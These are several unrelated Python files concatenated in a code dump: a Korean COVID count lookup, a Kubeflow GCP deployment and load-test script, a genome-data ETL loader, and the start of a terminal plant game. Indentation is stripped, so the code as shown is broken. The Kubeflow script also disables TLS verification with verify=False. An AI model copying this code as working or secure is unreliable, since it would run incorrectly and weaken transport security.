# while > 뒤로가기 입력전까지 menu 반복시행
while menu_choice == 1: # 전국 확진자 수 검색
js_file = "koreaRegionalData.js"
search_region = input("지역을 입력하세요 (ex:서울): ")
search_count(js_file,search_region)
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
while menu_choice == 2: # 서울 세부지역 확진자 수 검색
js_file = 'koreaData_Seoul_' + a + '.js'
search_region = input("지역을 입력하세요 (ex:종로구): ")
search_count(js_file,search_region,array_screen)
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
while menu_choice == 3: # 경기 세부지역 확진자 수 검색
js_file = "koreaData_Gyeonggi.js"
search_region = input("지역을 입력하세요 (ex:수원): ")
search_count(js_file,search_region)
print(str(count_change(js_file,search_region)),"명 증가")
if search_region == '0': # 0을 입력하면 메뉴로 복귀
break
if menu_choice == 4: # 메뉴 종료
menu = 0
|
test_deploy_app.py | # -*- coding: utf-8 -*-
# Script to start deployment api and make request to it.
import argparse
import base64
import datetime
import logging
import os
import errno
import shutil
import subprocess
import tempfile
import threading
from functools import partial
from multiprocessing import Process
from time import sleep
from google.auth.transport.requests import Request
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
from prometheus_client import start_http_server, Gauge, Counter
import requests
import yaml
import google.auth
import google.auth.compute_engine.credentials
import google.auth.iam
import google.oauth2.credentials
import google.oauth2.service_account
from retrying import retry
from kubeflow.testing import test_util
FILE_PATH = os.path.dirname(os.path.abspath(__file__))
SSL_DIR = os.path.join(FILE_PATH, "sslcert")
SSL_BUCKET = 'kubeflow-ci-deploy-cert'
IAM_SCOPE = 'https://www.googleapis.com/auth/iam'
OAUTH_TOKEN_URI = 'https://www.googleapis.com/oauth2/v4/token'
METHOD = 'GET'
SERVICE_HEALTH = Gauge(
'deployment_service_status',
'0: normal; 1: deployment not successful; 2: service down')
PROBER_HEALTH = Gauge('prober_health', '0: normal; 1: not working')
LOADTEST_HEALTH = Gauge('loadtest_health', '0: normal; 1: not working')
LOADTEST_SUCCESS = Gauge('loadtest_success',
'number of successful requests in current load test')
SUCCESS_COUNT = Counter('deployment_success_count',
'accumulative count of successful deployment')
FAILURE_COUNT = Counter('deployment_failure_count',
'accumulative count of failed deployment')
LOADTEST_ZONE = [
'us-central1-a', 'us-central1-c', 'us-east1-c', 'us-east1-d', 'us-west1-b'
]
class requestThread(threading.Thread):
def __init__(self, target_url, req_data, google_open_id_connect_token):
threading.Thread.__init__(self)
self.target_url = target_url
self.req_data = req_data
self.google_open_id_connect_token = google_open_id_connect_token
def run(self):
try:
resp = requests.post(
"https://%s/kfctl/e2eDeploy" % self.target_url,
json=self.req_data,
headers={
'Authorization':
'Bearer {}'.format(self.google_open_id_connect_token)
})
if resp.status_code != 200:
logging.error("request failed:%s\n request data:%s"
% (resp, self.req_data))
# Mark service down if return code abnormal
SERVICE_HEALTH.set(2)
except Exception as e:
logging.error(e)
SERVICE_HEALTH.set(2)
def may_get_env_var(name):
env_val = os.getenv(name)
if env_val:
logging.info("%s is set" % name)
return env_val
else:
raise Exception("%s not set" % name)
def getZone(args, deployment):
if args.mode == "loadtest":
return LOADTEST_ZONE[int(deployment[-1]) % len(LOADTEST_ZONE)]
return args.zone
def get_target_url(args):
if args.mode == "loadtest":
return "deploy-staging.kubeflow.cloud"
if args.mode == "prober":
return "deploy.kubeflow.cloud"
raise RuntimeError("No default target url for test mode %s !" % args.mode)
def prepare_request_data(args, deployment):
logging.info("prepare deploy call data")
with open(
os.path.join(FILE_PATH, "../bootstrap/config/gcp_prototype.yaml"),
'r') as conf_input:
defaultApp = yaml.load(conf_input)["defaultApp"]
for param in defaultApp["parameters"]:
if param["name"] == "acmeEmail":
param["value"] = args.email
if param["name"] == "ipName":
param["value"] = deployment + "-ip"
if param["name"] == "hostname":
param["value"] = "%s.endpoints.%s.cloud.goog" % (deployment, args.project)
defaultApp['registries'][0]['version'] = args.kfversion
access_token = util_run(
'gcloud auth application-default print-access-token'.split(' '),
cwd=FILE_PATH)
client_id = may_get_env_var("CLIENT_ID")
client_secret = may_get_env_var("CLIENT_SECRET")
credentials = GoogleCredentials.get_application_default()
crm = discovery.build('cloudresourcemanager', 'v1', credentials=credentials)
project = crm.projects().get(projectId=args.project).execute()
logging.info("project info: %s", project)
request_data = {
"AppConfig": defaultApp,
"Apply": True,
"AutoConfigure": True,
"ClientId": base64.b64encode(client_id.encode()).decode("utf-8"),
"ClientSecret": base64.b64encode(client_secret.encode()).decode("utf-8"),
"Cluster": deployment,
"Email": args.email,
"IpName": deployment + '-ip',
"Name": deployment,
"Namespace": 'kubeflow',
"Project": args.project,
"ProjectNumber": project["projectNumber"],
# service account client id of account: kubeflow-testing@kubeflow-ci.iam.gserviceaccount.com
"SAClientId": args.sa_client_id,
"Token": access_token,
"Zone": getZone(args, deployment)
}
logging.info("request data: %s", request_data)
return request_data
def make_e2e_call(args):
if not clean_up_resource(args, set([args.deployment])):
raise RuntimeError("Failed to cleanup resource")
req_data = prepare_request_data(args, args.deployment)
resp = requests.post(
"http://kubeflow-controller.%s.svc.cluster.local:8080/kfctl/e2eDeploy" %
args.namespace,
json=req_data)
if resp.status_code != 200:
raise RuntimeError("deploy request received status code: %s, message: %s" %
(resp.status_code, resp.text))
logging.info("deploy call done")
# Make 1 deployment request to service url, return if request call successful.
def make_prober_call(args, service_account_credentials):
logging.info("start new prober call")
req_data = prepare_request_data(args, args.deployment)
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
try:
resp = requests.post(
"https://%s/kfctl/e2eDeploy" % get_target_url(args),
json=req_data,
headers={
'Authorization': 'Bearer {}'.format(google_open_id_connect_token)
})
if resp.status_code != 200:
# Mark service down if return code abnormal
SERVICE_HEALTH.set(2)
return False
except Exception as e:
logging.error(e)
SERVICE_HEALTH.set(2)
return False
logging.info("prober call done")
return True
# For each deployment, make a request to service url, return if all requests call successful.
def make_loadtest_call(args, service_account_credentials, projects, deployments):
logging.info("start new load test call")
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
threads = []
for project in projects:
args.project = project
for deployment in deployments:
req_data = prepare_request_data(args, deployment)
threads.append(
requestThread(
get_target_url(args), req_data, google_open_id_connect_token))
for t in threads:
t.start()
for t in threads:
t.join()
if SERVICE_HEALTH._value.get() == 2:
return False
logging.info("load test call done")
return True
def get_gcs_path(mode, project, deployment):
return os.path.join(SSL_BUCKET, mode, project, deployment)
# Insert ssl cert into GKE cluster
def insert_ssl_cert(args, deployment):
logging.info("Wait till deployment is done and GKE cluster is up")
credentials = GoogleCredentials.get_application_default()
service = discovery.build('deploymentmanager', 'v2', credentials=credentials)
# Wait up to 10 minutes till GKE cluster up and available.
end_time = datetime.datetime.now() + datetime.timedelta(minutes=10)
while datetime.datetime.now() < end_time:
sleep(5)
try:
request = service.deployments().get(
project=args.project, deployment=deployment)
response = request.execute()
if response['operation']['status'] != 'DONE':
logging.info("Deployment running")
continue
except Exception as e:
logging.info("Deployment hasn't started")
continue
break
ssl_local_dir = os.path.join(SSL_DIR, args.project, deployment)
if os.path.exists(ssl_local_dir):
shutil.rmtree(ssl_local_dir)
os.makedirs(ssl_local_dir)
logging.info("donwload ssl cert and insert to GKE cluster")
try:
# TODO: switch to client lib
gcs_path = get_gcs_path(args.mode, args.project, deployment)
util_run(("gsutil cp gs://%s/* %s" % (gcs_path, ssl_local_dir)).split(' '))
except Exception:
logging.warning("ssl cert for %s doesn't exist in gcs" % args.mode)
# clean up local dir
shutil.rmtree(ssl_local_dir)
return True
try:
create_secret(args, deployment, ssl_local_dir)
except Exception as e:
logging.error(e)
return False
return True
@retry(wait_fixed=2000, stop_max_delay=15000)
def create_secret(args, deployment, ssl_local_dir):
util_run(
("gcloud container clusters get-credentials %s --zone %s --project %s" %
(deployment, getZone(args, deployment), args.project)).split(' '))
util_run(("kubectl create -f %s" % ssl_local_dir).split(' '))
# deployments: set(string) which contains all deployment names in current test round.
def check_deploy_status(args, deployments):
num_deployments = len(deployments)
logging.info("check deployment status")
service_account_credentials = get_service_account_credentials("CLIENT_ID")
google_open_id_connect_token = get_google_open_id_connect_token(
service_account_credentials)
# Wait up to 30 minutes for IAP access test.
num_req = 0
end_time = datetime.datetime.now() + datetime.timedelta(
minutes=args.iap_wait_min)
success_deploy = set()
while datetime.datetime.now() < end_time and len(deployments) > 0:
sleep(10)
num_req += 1
for deployment in deployments:
url = "https://%s.endpoints.%s.cloud.goog" % (deployment, args.project)
logging.info("Trying url: %s", url)
try:
resp = requests.request(
METHOD,
url,
headers={
'Authorization':
'Bearer {}'.format(google_open_id_connect_token)
},
verify=False)
if resp.status_code == 200:
success_deploy.add(deployment)
logging.info("IAP is ready for %s!", url)
else:
logging.info(
"%s: IAP not ready, request number: %s" % (deployment, num_req))
except Exception:
logging.info("%s: IAP not ready, exception caught, request number: %s" %
(deployment, num_req))
deployments = deployments.difference(success_deploy)
for deployment in success_deploy:
try:
ssl_local_dir = os.path.join(SSL_DIR, deployment)
try:
os.makedirs(ssl_local_dir)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(ssl_local_dir):
pass
else:
raise
util_run((
"gcloud container clusters get-credentials %s --zone %s --project %s"
% (deployment, getZone(args, deployment), args.project)).split(' '))
for sec in ["envoy-ingress-tls", "letsencrypt-prod-secret"]:
sec_data = util_run(
("kubectl get secret %s -n kubeflow -o yaml" % sec).split(' '))
with open(os.path.join(ssl_local_dir, sec + ".yaml"),
'w+') as sec_file:
sec_file.write(sec_data)
sec_file.close()
# TODO: switch to client lib
gcs_path = get_gcs_path(args.mode, args.project, deployment)
util_run(
("gsutil cp %s/* gs://%s/" % (ssl_local_dir, gcs_path)).split(' '))
except Exception:
logging.error("%s: failed uploading ssl cert" % deployment)
# return number of successful deployments
return num_deployments - len(deployments)
def get_service_account_credentials(client_id_key):
# Figure out what environment we're running in and get some preliminary
# information about the service account.
credentials, _ = google.auth.default(scopes=[IAM_SCOPE])
if isinstance(credentials, google.oauth2.credentials.Credentials):
raise Exception('make_iap_request is only supported for service '
'accounts.')
# For service account's using the Compute Engine metadata service,
# service_account_email isn't available until refresh is called.
credentials.refresh(Request())
signer_email = credentials.service_account_email
if isinstance(credentials,
google.auth.compute_engine.credentials.Credentials):
signer = google.auth.iam.Signer(Request(), credentials, signer_email)
else:
# A Signer object can sign a JWT using the service account's key.
signer = credentials.signer
# Construct OAuth 2.0 service account credentials using the signer
# and email acquired from the bootstrap credentials.
return google.oauth2.service_account.Credentials(
signer,
signer_email,
token_uri=OAUTH_TOKEN_URI,
additional_claims={'target_audience': may_get_env_var(client_id_key)})
def get_google_open_id_connect_token(service_account_credentials):
service_account_jwt = (
service_account_credentials._make_authorization_grant_assertion())
request = google.auth.transport.requests.Request()
body = {
'assertion': service_account_jwt,
'grant_type': google.oauth2._client._JWT_GRANT_TYPE,
}
token_response = google.oauth2._client._token_endpoint_request(
request, OAUTH_TOKEN_URI, body)
return token_response['id_token']
def delete_gcloud_resource(args, keyword, filter='', dlt_params=[]):
# TODO: switch to client lib
get_cmd = 'gcloud compute %s list --project=%s --format="value(name)"' % (
keyword, args.project)
elements = util_run(get_cmd + filter, shell=True)
for element in elements.split('\n'):
dlt_cmd = 'gcloud compute %s delete -q --project=%s %s' % (
keyword, args.project, element)
try:
util_run(dlt_cmd.split(' ') + dlt_params)
except Exception as e:
logging.warning('Cannot remove %s %s' % (keyword, element))
logging.warning(e)
def clean_up_resource(args, deployments):
"""Clean up deployment / app config from previous test
Args:
args: The args from ArgParse.
deployments set(string): which contains all deployment names in current test round.
Returns:
bool: True if cleanup is done
"""
logging.info(
"Clean up project resource (source repo, backend service and deployment)")
# Delete source repo
sr_cmd = 'gcloud -q source repos delete %s-kubeflow-config --project=%s' % (
args.project, args.project)
try:
util_run(sr_cmd.split(' '), cwd=FILE_PATH)
except Exception as e:
logging.warning(e)
# Delete deployment
credentials = GoogleCredentials.get_application_default()
service = discovery.build('deploymentmanager', 'v2', credentials=credentials)
delete_done = False
for deployment in deployments:
try:
request = service.deployments().delete(
project=args.project, deployment=deployment)
request.execute()
except Exception as e:
logging.info("Deployment doesn't exist, continue")
# wait up to 10 minutes till delete finish.
end_time = datetime.datetime.now() + datetime.timedelta(minutes=10)
while datetime.datetime.now() < end_time:
sleep(10)
try:
request = service.deployments().list(project=args.project)
response = request.execute()
if ('deployments' not in response) or (len(deployments & set(
d['name'] for d in response['deployments'])) == 0):
delete_done = True
break
except Exception:
logging.info("Failed listing current deployments, retry in 10 seconds")
# Delete target-http-proxies
delete_gcloud_resource(args, 'target-http-proxies')
# Delete target-http-proxies
delete_gcloud_resource(args, 'target-https-proxies')
# Delete url-maps
delete_gcloud_resource(args, 'url-maps')
# Delete backend-services
delete_gcloud_resource(args, 'backend-services', dlt_params=['--global'])
# Delete instance-groups
for zone in LOADTEST_ZONE:
delete_gcloud_resource(
args,
'instance-groups unmanaged',
filter=' --filter=INSTANCES:0',
dlt_params=['--zone=' + zone])
# Delete ssl-certificates
delete_gcloud_resource(args, 'ssl-certificates')
# Delete health-checks
delete_gcloud_resource(args, 'health-checks')
if not delete_done:
logging.error("failed to clean up resources for project %s deployments %s",
args.project, deployments)
return delete_done
def util_run(command,
cwd=None,
env=None,
shell=False,
polling_interval=datetime.timedelta(seconds=1)):
"""Run a subprocess.
Any subprocess output is emitted through the logging modules.
Returns:
output: A string containing the output.
"""
logging.info("Running: %s \ncwd=%s", " ".join(command), cwd)
if not env:
env = os.environ
else:
keys = sorted(env.keys())
lines = []
for k in keys:
lines.append("{0}={1}".format(k, env[k]))
logging.info("Running: Environment:\n%s", "\n".join(lines))
process = subprocess.Popen(
command,
cwd=cwd,
env=env,
shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# logging.info("Subprocess output:\n")
output = []
while process.poll() is None:
process.stdout.flush()
for line in iter(process.stdout.readline, ''):
output.append(line.strip('\n'))
# logging.info(line.strip())
sleep(polling_interval.total_seconds())
process.stdout.flush()
for line in iter(process.stdout.readline, b''):
output.append(line.strip('\n'))
# logging.info(line.strip())
if process.returncode != 0:
raise subprocess.CalledProcessError(
process.returncode, "cmd: {0} exited with code {1}".format(
" ".join(command), process.returncode), "\n".join(output))
return "\n".join(output)
def clean_up_project_resource(args, projects, deployments):
proc = []
for project in projects:
args.project = project
p = Process(target = partial(clean_up_resource, args, deployments))
p.start()
proc.append(p)
for p in proc:
p.join()
def upload_load_test_ssl_cert(args, projects, deployments):
for project in projects:
args.project = project
for deployment in deployments:
insert_ssl_cert(args, deployment)
def check_load_test_results(args, projects, deployments):
num_deployments = len(deployments)
total_success = 0
# deadline for checking all the results.
end_time = datetime.datetime.now() + datetime.timedelta(
minutes=args.iap_wait_min)
for project in projects:
args.project = project
# set the deadline for each check.
now = datetime.datetime.now()
if end_time < now:
args.iap_wait_min = 1
else:
delta = end_time - now
args.iap_wait_min = delta.seconds / 60 + 1
num_success = check_deploy_status(args, deployments)
total_success += num_success
logging.info("%s out of %s deployments succeed for project %s",
num_success, num_deployments, project)
# We only wait 1 minute for subsequent checks because we already waited forIAP since we already
args.iap_wait_min = 1
LOADTEST_SUCCESS.set(num_success)
if num_success == num_deployments:
SUCCESS_COUNT.inc()
else:
FAILURE_COUNT.inc()
logging.info("%s out of %s deployments succeed in total",
total_success, num_deployments * len(projects))
def run_load_test(args):
num_deployments = args.number_deployments_per_project
num_projects = args.number_projects
start_http_server(8000)
LOADTEST_SUCCESS.set(num_deployments)
LOADTEST_HEALTH.set(0)
service_account_credentials = get_service_account_credentials(
"SERVICE_CLIENT_ID")
deployments = set(
['kubeflow' + str(i) for i in range(1, num_deployments + 1)])
projects = [args.project_prefix + str(i)
for i in range(1, num_projects + 1)]
logging.info("deployments: %s" % deployments)
logging.info("projects: %s" % projects)
clean_up_project_resource(args, projects, deployments)
if not make_loadtest_call(
args, service_account_credentials, projects, deployments):
LOADTEST_SUCCESS.set(0)
FAILURE_COUNT.inc()
logging.error("load test request failed")
return
upload_load_test_ssl_cert(args, projects, deployments)
check_load_test_results(args, projects, deployments)
clean_up_project_resource(args, projects, deployments)
def run_e2e_test(args):
sleep(args.wait_sec)
make_e2e_call(args)
insert_ssl_cert(args, args.deployment)
if not check_deploy_status(args, set([args.deployment])):
raise RuntimeError("IAP endpoint not ready after 30 minutes, time out...")
logging.info("Test finished.")
def wrap_test(args):
"""Run the tests given by args.func and output artifacts as necessary.
"""
test_name = "bootstrapper"
test_case = test_util.TestCase()
test_case.class_name = "KubeFlow"
test_case.name = args.workflow_name + "-" + test_name
try:
def run():
args.func(args)
test_util.wrap_test(run, test_case)
finally:
# Test grid has problems with underscores in the name.
# https://github.com/kubeflow/kubeflow/issues/631
# TestGrid currently uses the regex junit_(^_)*.xml so we only
# want one underscore after junit.
junit_name = test_case.name.replace("_", "-")
junit_path = os.path.join(args.artifacts_dir,
"junit_{0}.xml".format(junit_name))
logging.info("Writing test results to %s", junit_path)
test_util.create_junit_xml_file([test_case], junit_path)
# Clone repos to tmp folder and build docker images
def main(unparsed_args=None):
parser = argparse.ArgumentParser(
description="Start deployment api and make request to it.")
parser.add_argument(
"--deployment",
default="periodic-test",
type=str,
help="Deployment name.")
parser.add_argument(
"--email",
default="google-kubeflow-support@google.com",
type=str,
help="Email used during e2e test")
parser.add_argument(
"--project",
default="kubeflow-ci-deployment",
type=str,
help="e2e test project id")
parser.add_argument(
"--project_prefix",
default="kf-gcp-deploy-test",
type=str,
help="project prefix for load test")
parser.add_argument(
"--number_projects",
default="2",
type=int,
help="number of projects used in load test")
parser.add_argument(
"--number_deployments_per_project",
default="5",
type=int,
help="number of deployments per project used in load test")
parser.add_argument(
"--namespace",
default="",
type=str,
help="namespace where deployment service is running")
parser.add_argument(
"--wait_sec", default=120, type=int, help="oauth client secret")
parser.add_argument(
"--iap_wait_min", default=30, type=int, help="minutes to wait for IAP")
parser.add_argument(
"--zone", default="us-east1-d", type=str, help="GKE cluster zone")
parser.add_argument(
"--sa_client_id",
default="111670663612681935351",
type=str,
help="Service account client id")
parser.add_argument(
"--kfversion",
default="v0.4.1",
type=str,
help="Service account client id")
parser.add_argument(
"--mode",
default="e2e",
type=str,
help="offer three test mode: e2e, prober, and loadtest")
# args for e2e test
parser.set_defaults(func=run_e2e_test)
parser.add_argument(
"--artifacts_dir",
default="",
type=str,
help="Directory to use for artifacts that should be preserved after "
"the test runs. Defaults to test_dir if not set.")
parser.add_argument(
"--workflow_name",
default="deployapp",
type=str,
help="The name of the workflow.")
args = parser.parse_args(args=unparsed_args)
if not args.artifacts_dir:
args.artifacts_dir = tempfile.gettempdir()
util_run(
('gcloud auth activate-service-account --key-file=' +
may_get_env_var("GOOGLE_APPLICATION_CREDENTIALS")).split(' '),
cwd=FILE_PATH)
if args.mode == "e2e":
wrap_test(args)
if args.mode == "prober":
start_http_server(8000)
SERVICE_HEALTH.set(0)
PROBER_HEALTH.set(0)
service_account_credentials = get_service_account_credentials(
"SERVICE_CLIENT_ID")
while True:
sleep(args.wait_sec)
if not clean_up_resource(args, set([args.deployment])):
PROBER_HEALTH.set(1)
FAILURE_COUNT.inc()
logging.error(
"request cleanup failed, retry in %s seconds" % args.wait_sec)
continue
PROBER_HEALTH.set(0)
if make_prober_call(args, service_account_credentials):
if insert_ssl_cert(args, args.deployment):
PROBER_HEALTH.set(0)
else:
PROBER_HEALTH.set(1)
FAILURE_COUNT.inc()
logging.error("request insert_ssl_cert failed, retry in %s seconds" %
args.wait_sec)
continue
if check_deploy_status(args, set([args.deployment])):
SERVICE_HEALTH.set(0)
SUCCESS_COUNT.inc()
else:
SERVICE_HEALTH.set(1)
FAILURE_COUNT.inc()
else:
SERVICE_HEALTH.set(2)
FAILURE_COUNT.inc()
logging.error(
"prober request failed, retry in %s seconds" % args.wait_sec)
if args.mode == "loadtest":
run_load_test(args)
if __name__ == '__main__':
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
logging.getLogger().setLevel(logging.INFO)
main()
|
aggregate_loader.py | #!/usr/bin/env python
"""This is the main entry-point for running the ETL pipeline."""
import argparse
import logging
import multiprocessing
import os
import time
import coloredlogs
from etl import (BGIETL, DOETL, ECOMAPETL, ETL, GOETL, MIETL, VEPETL,
AffectedGenomicModelETL, AlleleETL, ClosureETL, ConstructETL,
DiseaseETL, ExpressionAtlasETL, ExpressionETL,
ExpressionRibbonETL, ExpressionRibbonOtherETL,
GeneDescriptionsETL, GeneDiseaseOrthoETL, GenericOntologyETL,
GeoXrefETL, GOAnnotETL, MolecularInteractionETL, Neo4jHelper,
NodeCountETL, OrthologyETL, PhenoTypeETL,
SequenceTargetingReagentETL, SpeciesETL, TranscriptETL,
VariationETL, VEPTranscriptETL,
HTPMetaDatasetSampleETL, HTPMetaDatasetETL)
from transactors import FileTransactor, Neo4jTransactor
from data_manager import DataFileManager
from files import Download
from loader_common import ContextInfo # Must be the last timeport othersize program fails
def main():
"""Entry point to ETL program."""
parser = argparse.ArgumentParser(
description='Load data into the Neo4j database for the Alliance of Genome Resources.'
)
parser.add_argument(
'-c',
'--config', help='Specify the filename of the YAML config. It must reside in the src/config/ directory',
default='default.yml'
)
parser.add_argument('-v',
'--verbose',
help='Enable DEBUG mode for logging.',
action='store_true')
args = parser.parse_args()
# set context info
context_info = ContextInfo()
context_info.config_file_location = os.path.abspath('src/config/' + args.config)
if args.verbose:
context_info.env["DEBUG"] = True
debug_level = logging.DEBUG if context_info.env["DEBUG"] else logging.INFO
coloredlogs.install(level=debug_level,
fmt='%(asctime)s %(levelname)s: %(name)s:%(lineno)d: %(message)s',
field_styles={
'asctime': {'color': 'green'},
'hostname': {'color': 'magenta'},
'levelname': {'color': 'white', 'bold': True},
'name': {'color': 'blue'},
'programname': {'color': 'cyan'}
})
logger = logging.getLogger(__name__)
logging.getLogger("ontobio").setLevel(logging.ERROR)
AggregateLoader(args, logger, context_info).run_loader()
class AggregateLoader():
"""This runs all the individiual ETL pipelines."""
# This is the list of ETLs used for loading data.
# The key (left) is derived from a value in the config YAML file.
# The value (right) is hard-coded by a developer as the name of an ETL class.
etl_dispatch = {
'SPECIES': SpeciesETL,
'MI': MIETL, # Special case. Grouped under "Ontology" but has a unique ETL.
'DOID': DOETL, # Special case. Grouped under "Ontology" but has a unique ETL.
'BGI': BGIETL,
'CONSTRUCT': ConstructETL,
'GENEEEXPRESSIONATLASSITEMAP': ExpressionAtlasETL,
'ONTOLOGY': GenericOntologyETL,
'ECOMAP': ECOMAPETL,
'ALLELE': AlleleETL,
'VARIATION': VariationETL,
'SQTR': SequenceTargetingReagentETL,
'AGM': AffectedGenomicModelETL,
'PHENOTYPE': PhenoTypeETL,
'GFF': TranscriptETL,
'GO': GOETL,
'EXPRESSION': ExpressionETL,
'ExpressionRibbon': ExpressionRibbonETL,
'ExpressionRibbonOther': ExpressionRibbonOtherETL,
'DAF': DiseaseETL,
'ORTHO': OrthologyETL,
'Closure': ClosureETL,
'GAF': GOAnnotETL,
'GEOXREF': GeoXrefETL,
'HTPDATASET': HTPMetaDatasetETL,
'HTPDATASAMPLE': HTPMetaDatasetSampleETL,
'GeneDiseaseOrtho': GeneDiseaseOrthoETL,
'INTERACTION-MOL': MolecularInteractionETL,
'GeneDescriptions': GeneDescriptionsETL,
'VEPGENE': VEPETL,
'VEPTRANSCRIPT': VEPTranscriptETL,
'DB-SUMMARY': NodeCountETL
}
# This is the order in which data types are loaded.
# After each list, the loader will "pause" and wait for that item to finish.
# i.e. After Ontology, there will be a pause.
# After GO, DO, MI, there will be a pause, etc.
etl_groups = [
['SPECIES'],
['DOID', 'MI'],
['GO'],
['ONTOLOGY'],
['ECOMAP'],
['BGI'],
['CONSTRUCT'],
['ALLELE'],
['VARIATION'],
['SQTR'],
['AGM'],
['PHENOTYPE'], # Locks Genes
['DAF'], # Locks Genes
['ORTHO'], # Locks Genes
['GeneDiseaseOrtho'],
['GFF'],
['EXPRESSION'],
['ExpressionRibbon'],
['ExpressionRibbonOther'],
['GENEEEXPRESSIONATLASSITEMAP'],
['GAF'], # Locks Genes
['GEOXREF'], # Locks Genes
['HTPDATASET'],
['HTPDATASAMPLE'],
['INTERACTION-MOL'],
['Closure'],
['GeneDescriptions'],
['VEPGENE'],
['VEPTRANSCRIPT'],
['DB-SUMMARY']
]
def __init__(self, args, logger, context_info):
"""Initialise object."""
self.args = args
self.logger = logger
self.context_info = context_info
self.start_time = time.time()
context_info = ContextInfo()
self.schema_branch = context_info.env["TEST_SCHEMA_BRANCH"]
if self.schema_branch != 'master':
self.logger.warning("*******WARNING: Using branch %s for schema.", self.schema_branch)
# Lets delete the old files and down load new ones. They are small.
for name in ['tmp/species.yaml', 'tmp/resourceDescriptors.yaml']:
if os.path.exists(name):
self.logger.warning("*********WARNING: removing old %s file.", name)
os.remove(name)
self.logger.info("Getting files initially")
url = 'https://raw.githubusercontent.com/alliance-genome/agr_schemas/SCHEMA_BRANCH/resourceDescriptors.yaml'
url = url.replace('SCHEMA_BRANCH', self.schema_branch)
Download('tmp', url, 'resourceDescriptors.yaml').get_downloaded_data()
url = 'https://raw.githubusercontent.com/alliance-genome/agr_schemas/SCHEMA_BRANCH/ingest/species/species.yaml'
url = url.replace('SCHEMA_BRANCH', self.schema_branch)
Download('tmp', url, 'species.yaml').get_downloaded_data()
self.logger.info("Finished getting files initially")
@classmethod
def run_etl_groups(cls, logger, data_manager, neo_transactor):
"""Run each of the ETLs in parallel."""
etl_time_tracker_list = []
for etl_group in cls.etl_groups:
etl_group_start_time = time.time()
logger.info("Starting ETL group: %s" % etl_group)
thread_pool = []
for etl_name in etl_group:
logger.info("ETL Name: %s" % etl_name)
config = data_manager.get_config(etl_name)
if config is not None:
etl = cls.etl_dispatch[etl_name](config)
process = multiprocessing.Process(target=etl.run_etl)
process.start()
thread_pool.append(process)
else:
logger.info("No Config found for: %s" % etl_name)
ETL.wait_for_threads(thread_pool)
logger.info("Waiting for Queues to sync up")
neo_transactor.check_for_thread_errors()
neo_transactor.wait_for_queues()
etl_elapsed_time = time.time() - etl_group_start_time
etl_time_message = ("Finished ETL group: %s, Elapsed time: %s"
% (etl_group,
time.strftime("%H:%M:%S", time.gmtime(etl_elapsed_time))))
logger.info(etl_time_message)
etl_time_tracker_list.append(etl_time_message)
return etl_time_tracker_list
def run_loader(self):
"""Run the loader."""
if self.args.verbose:
self.logger.warn('DEBUG mode enabled!')
time.sleep(3)
data_manager = DataFileManager(self.context_info.config_file_location)
file_transactor = FileTransactor()
file_transactor.start_threads(data_manager.get_file_transactor_thread_settings())
data_manager.download_and_validate()
self.logger.debug("finished downloading now doing thread")
file_transactor.check_for_thread_errors()
self.logger.debug("finished threads waiting for queues")
file_transactor.wait_for_queues()
self.logger.debug("finished queues waiting for shutdown")
file_transactor.shutdown()
neo_transactor = Neo4jTransactor()
neo_transactor.start_threads(data_manager.get_neo_transactor_thread_settings())
self.logger.debug("finished starting neo threads ")
if not self.context_info.env["USING_PICKLE"]:
self.logger.info("Creating indices.")
Neo4jHelper.create_indices()
etl_time_tracker_list = self.run_etl_groups(self.logger, data_manager, neo_transactor)
neo_transactor.shutdown()
elapsed_time = time.time() - self.start_time
for time_item in etl_time_tracker_list:
self.logger.info(time_item)
self.logger.info('Loader finished. Elapsed time: %s' % time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
if __name__ == '__main__':
main()
|
botany.py | #!/usr/bin/env python2
from __future__ import division
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
'cursed',
'buff',
'narcotic',
'gnu/linux',
'abraxan', # rip dear friend
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
